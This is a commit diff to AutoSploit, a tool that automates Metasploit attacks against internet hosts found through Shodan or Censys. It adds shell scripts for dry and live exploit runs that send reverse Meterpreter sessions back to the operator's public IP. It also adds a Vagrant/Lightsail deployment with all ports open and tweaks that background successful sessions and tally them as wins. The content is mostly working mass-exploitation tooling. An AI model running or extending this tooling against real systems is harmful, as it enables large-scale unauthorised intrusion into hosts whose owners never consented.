PR #133 cleaned - Autosploit Automation (#134)

Selora · Ekultek · commit 4506271af09f · 2018-04-09T19:36:55.000-05:00
* Scripts to automate autosploit.
./dryrun_autosploit.sh will search censys/shodan/etc and do a dry-run against discovered hosts that are in the whitelist.
VALIDATE THE DRYRUN REPORT BEFORE LAUNCHING THE ACTUAL EXPLOIT RUN
./run_autosploit.sh will run autosploit in exploit mode against previously discovered hosts in the whitelist.

* Removed blocking MSF modules from default module list.

Added a fuzzers-only json file.
In the same idea, Trans2open exploits are taking about 2h+ per host to run.
Maybe implement a "long run" feature in the next release?

* Added a vagrant config to easily deploy autosploit to aws-lightsail.
COMES WITHOUT WARRANTY. Use as a starting point.
Tweaks to make it usable for dev:
	- Setup a synced folder with your autosploit dev in the Vagrantfile
		Refer to vagrant doc.
	- Use vagrant rsync-auto

Since vagrant file cannot really be shared as-is, some tweakings might be necessary.
Try:
-Modifying the Vagrantfile according to your ssh keys path
-Installing the aws-cli pacakge
-Configuring ~/.aws directory

* Bugfix and improvements:
Successful exploits will start meterpreter in background.
Fixed counter for successful exploits/failed exploits bug, counting success/failure occurence, not line outputs.
Success/failures now grepping escaped MSF output for success/failures.
Grepping for keywords such as "Meterpreter", "Session" for success.
diff --git a/Vagrant/Vagrantfile b/Vagrant/Vagrantfile
@@ -0,0 +1,28 @@
+# Use as a strating point to spin up a box in lightsail.
+# the vagrant-lightsail plugin is required
+# You probably also need to:
+# - Configure the ssh keys path
+# - Install and configure the aws-cli package
+
+Vagrant.configure('2') do |config|
+	config.vm.synced_folder ".", "/vagrant", type: "rsync",
+		rsync__exclude: ".git/",
+		rsync__auto: true
+
+	config.ssh.private_key_path		= '/path/to/id_rsa'
+	config.ssh.username				= 'ubuntu'
+	config.vm.box					= 'lightsail'
+	config.vm.box_url				= 'https://github.com/thejandroman/vagrant-lightsail/raw/master/box/lightsail.box'
+	config.vm.hostname				= 'autosploit-launcher'
+
+	config.vm.provider :lightsail do |provider, override|
+		provider.port_info		 	= [{ from_port: 0, to_port: 65535, protocol:
+		'all' }]
+		provider.keypair_name		= 'id_rsa'
+		provider.bundle_id			= 'small_1_0'
+	end
+
+	config.vm.provision "bootstrap", type: "shell", run: "once" do |s|
+		s.path	= "./bootstrap/bootstrap.sh"
+	end
+end
diff --git a/Vagrant/bootstrap/bootstrap.sh b/Vagrant/bootstrap/bootstrap.sh
@@ -0,0 +1,20 @@
+#!/usr/bin/env bash
+
+
+echo "Yolosploit configurator 2.42"
+sudo apt-get --yes update
+sudo apt-get --yes upgrade
+
+echo "Installing metasploit. BE PATIENT (5 min max?)"
+wget --quiet https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
+chmod +x metasploit-latest-linux-x64-installer.run
+sudo ./metasploit-latest-linux-x64-installer.run --unattendedmodeui none --prefix /opt/msf --mode unattended
+
+echo "Installing pyhton2"
+sudo apt-get --yes install python python-pip python-virtualenv git
+
+sudo apt-get --yes install fish
+sudo chsh -s /usr/bin/fish ubuntu
+
+cd ~
+git clone https://github.com/NullArray/AutoSploit
diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh
@@ -0,0 +1,28 @@
+#!/usr/bin/env bash
+
+
+if [[ $# -lt 2 ]]; then
+    echo "Syntax:"
+    echo -e "\t./dryrun_autosploit.sh <whitelist.txt> <search_query>"
+	exit 1
+fi
+
+WHITELIST=$1
+SEARCH_QUERY=$2
+LPORT=4444
+
+LHOST=`dig +short @resolver1.opendns.com myip.opendns.com`
+TIMESTAMP=`date +%s`
+
+
+echo "python autosploit.py -s -c -q \"${SEARCH_QUERY}\" --overwrite \
+    --whitelist $WHITELIST -e \
+    -C \"msf_autorun_${TIMESTAMP}\" $LHOST $LPORT \
+    --exploit-file-to-use etc/json/default_modules.json \
+    --dry-run"
+
+python autosploit.py -s -c -q "${SEARCH_QUERY}" --overwrite \
+    --whitelist $WHITELIST -e \
+    -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT \
+    --exploit-file-to-use etc/json/default_modules.json \
+    --dry-run
diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json
@@ -263,27 +263,6 @@
      "exploit/windows/smb/ipass_pipe_exec",
      "exploit/windows/smb/smb_relay",
      "auxiliary/sqli/oracle/jvm_os_code_10g",
-     "auxiliary/sqli/oracle/jvm_os_code_11g",
-     "auxiliary/fuzzers/dns/dns_fuzzer",
-     "auxiliary/fuzzers/ftp/client_ftp",
-     "auxiliary/fuzzers/ftp/ftp_pre_post",
-     "auxiliary/fuzzers/http/http_form_field",
-     "auxiliary/fuzzers/http/http_get_uri_long",
-     "auxiliary/fuzzers/http/http_get_uri_strings",
-     "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer",
-     "auxiliary/fuzzers/smb/smb2_negotiate_corrupt",
-     "auxiliary/fuzzers/smb/smb_create_pipe",
-     "auxiliary/fuzzers/smb/smb_create_pipe_corrupt",
-     "auxiliary/fuzzers/smb/smb_negotiate_corrupt ",
-     "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt",
-     "auxiliary/fuzzers/smb/smb_tree_connect",
-     "auxiliary/fuzzers/smb/smb_tree_connect_corrupt",
-     "auxiliary/fuzzers/smtp/smtp_fuzzer",
-     "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt",
-     "auxiliary/fuzzers/ssh/ssh_version_15",
-     "auxiliary/fuzzers/ssh/ssh_version_2",
-     "auxiliary/fuzzers/ssh/ssh_version_corrupt",
-     "auxiliary/fuzzers/tds/tds_login_corrupt",
-     "auxiliary/fuzzers/tds/tds_login_username"
+     "auxiliary/sqli/oracle/jvm_os_code_11g"
   ]
 }
diff --git a/etc/json/fuzzers.json b/etc/json/fuzzers.json
@@ -0,0 +1,25 @@
+{
+  "exploits": [
+    "auxiliary/fuzzers/dns/dns_fuzzer",
+    "auxiliary/fuzzers/ftp/client_ftp",
+    "auxiliary/fuzzers/ftp/ftp_pre_post",
+    "auxiliary/fuzzers/http/http_form_field",
+    "auxiliary/fuzzers/http/http_get_uri_long",
+    "auxiliary/fuzzers/http/http_get_uri_strings",
+    "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer",
+    "auxiliary/fuzzers/smb/smb2_negotiate_corrupt",
+    "auxiliary/fuzzers/smb/smb_create_pipe",
+    "auxiliary/fuzzers/smb/smb_create_pipe_corrupt",
+    "auxiliary/fuzzers/smb/smb_negotiate_corrupt ",
+    "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt",
+    "auxiliary/fuzzers/smb/smb_tree_connect",
+    "auxiliary/fuzzers/smb/smb_tree_connect_corrupt",
+    "auxiliary/fuzzers/smtp/smtp_fuzzer",
+    "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt",
+    "auxiliary/fuzzers/ssh/ssh_version_15",
+    "auxiliary/fuzzers/ssh/ssh_version_2",
+    "auxiliary/fuzzers/ssh/ssh_version_corrupt",
+    "auxiliary/fuzzers/tds/tds_login_corrupt",
+    "auxiliary/fuzzers/tds/tds_login_username"
+  ]
+}
diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py
@@ -121,7 +121,7 @@ def start_exploit(self):
                     "setg threads 20\n"
                     "set rhost {rhost}\n"
                     "set rhosts {rhosts}\n"
-                    "run\n"
+                    "run -z\n"
                     "exit\n"
                 )
 
@@ -156,22 +156,29 @@ def start_exploit(self):
                         output = lib.settings.cmdline(cmd)
 
                     ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
-                    msf_output_lines = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)])
-                    msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x)])
-                    msf_fails = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[-\]', x)])
+                    msf_output_lines = [ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)]
 
-                    win_total += len(msf_wins)
-                    fail_total += len(msf_fails)
+                    msf_wins = [x for x in msf_output_lines if re.search('\[\+\]', x) or
+                                             'Meterpreter' in x or
+                                             'Session' in x or
+                                             'Sending stage' in x]
+
+                    msf_fails = [x for x in msf_output_lines if re.search('\[-\]', x)]
+
+                    if len(msf_wins):
+                        win_total += 1
+                    if len(msf_fails):
+                        fail_total += 1
 
                     csv_file = csv.writer(f, quoting=csv.QUOTE_ALL)
                     csv_file.writerow([rhost,
                                        today_printable,
                                        module_name,
                                        lhost,
                                        lport,
-                                       msf_wins,
-                                       msf_fails,
-                                       msf_output_lines])
+                                       linesep.join(msf_wins),
+                                       linesep.join(msf_fails),
+                                       linesep.join(msf_output_lines)])
 
         print()
         lib.output.info("********RESULTS**********")
diff --git a/run_autosploit.sh b/run_autosploit.sh
@@ -0,0 +1,16 @@
+#!/usr/bin/env bash
+
+
+if [[ $# -lt 2 ]]; then
+    echo "Syntax:"
+    echo -e "\t./run_autosploit.sh <whitelist.txt> <exposed_lport>"
+	exit 1
+fi
+
+WHITELIST=$1
+LPORT=$2
+
+LHOST=`dig +short @resolver1.opendns.com myip.opendns.com`
+TIMESTAMP=`date +%s`
+
+python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT -f etc/json/default_modules.json
